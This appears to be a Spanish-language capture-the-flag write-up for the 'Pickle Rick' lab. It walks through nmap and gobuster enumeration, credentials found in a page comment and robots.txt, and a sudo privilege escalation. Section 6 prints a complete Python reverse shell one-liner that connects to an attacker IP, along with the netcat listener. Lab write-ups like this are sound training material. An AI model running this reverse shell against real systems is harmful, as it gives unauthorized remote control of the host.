Pickle Rick

Introducción

Este informe detalla el proceso de enumeración y análisis inicial realizado sobre el host rick.thm (10.10.229.244) utilizando la herramienta Nmap. Se describen los hallazgos relevantes, los servicios expuestos, así como los pasos siguientes para la explotación y escalada de privilegios.

1. Escaneo de Puertos con Nmap

El primer paso fue realizar un escaneo de puertos con Nmap utilizando las opciones -A -sT, que permiten la detección avanzada de servicios y sistemas operativos. Se guardó la salida en un archivo resultado.txt para su posterior análisis.

Comando utilizado:

nmap -A -sT rick.thm -oN resultado.txt

Resultados obtenidos:

Host: rick.thm (10.10.229.244)
Estado: Activo (latencia 0.18s)
Puertos abiertos:
- **22/tcp**: OpenSSH 8.2p1 (Ubuntu 4ubuntu0.11)
- **80/tcp**: Apache HTTP 2.4.41 (Ubuntu)

2. Análisis del Código Fuente del Sitio Web

Se encontró un comentario en el código fuente con el nombre de usuario:

<!-- Username: R1ckRul3s -->

3. Exploración de Directorios con Gobuster

Se utilizó Gobuster para la búsqueda de directorios ocultos y archivos accesibles:

gobuster dir -u http://rick.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50

Resultados encontrados:

/login.php            (Status: 200)
/index.html           (Status: 200)
/assets               (Status: 301)
/portal.php           (Status: 302) -> /login.php
/robots.txt           (Status: 200)

En robots.txt, se encontró la siguiente información:

WubbaLubbaDubDub

4. Autenticación en el Portal Web

Se intentó el acceso en /login.php con las credenciales:

  • Usuario: R1ckRul3s

  • Contraseña: WubbaLubbaDubDub

El acceso fue exitoso y se redirigió al portal /portal.php.

5. Descubrimiento de Archivos Mediante Comandos

Dentro del portal, en la pestaña Commands, se ejecutó ls, obteniendo:

Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

Dado que otros archivos estaban bloqueados, se intentó acceder directamente a http://rick.thm/Sup3rS3cretPickl3Ingred.txt, lo cual permitió encontrar el primer ingrediente.

6. Creación de una Consola de Conexión Remota

Para obtener acceso interactivo al sistema, se estableció una reverse shell utilizando Python.

Comando utilizado en el servidor (Rick.thm):

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.17.22",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Configuración en la máquina atacante:

nc -lvnp 4444

Tras la ejecución de estos comandos, se logró acceso remoto al sistema.

7. Obtención de Información Clave

Al explorar el sistema, en la ruta /home/rick/, se encontró un archivo llamado "second ingredients". Al visualizar su contenido, se obtuvo la clave secreta:

********

8. Escalada de Privilegios

Se detectó que el usuario podía ejecutar comandos con sudo, lo que permitió escalar privilegios con el siguiente comando:

sudo /bin/bash

Una vez en modo root, se accedió al archivo en /root/3rd.txt, obteniendo el último ingrediente:

**********

9. Conclusión y Pasos Finales

  • Se logró acceso inicial al sistema mediante credenciales obtenidas en el código fuente.

  • Se identificaron archivos clave en el sistema y se accedió a información sensible.

  • Se escaló privilegios con sudo y se accedió al último ingrediente.

Última actualización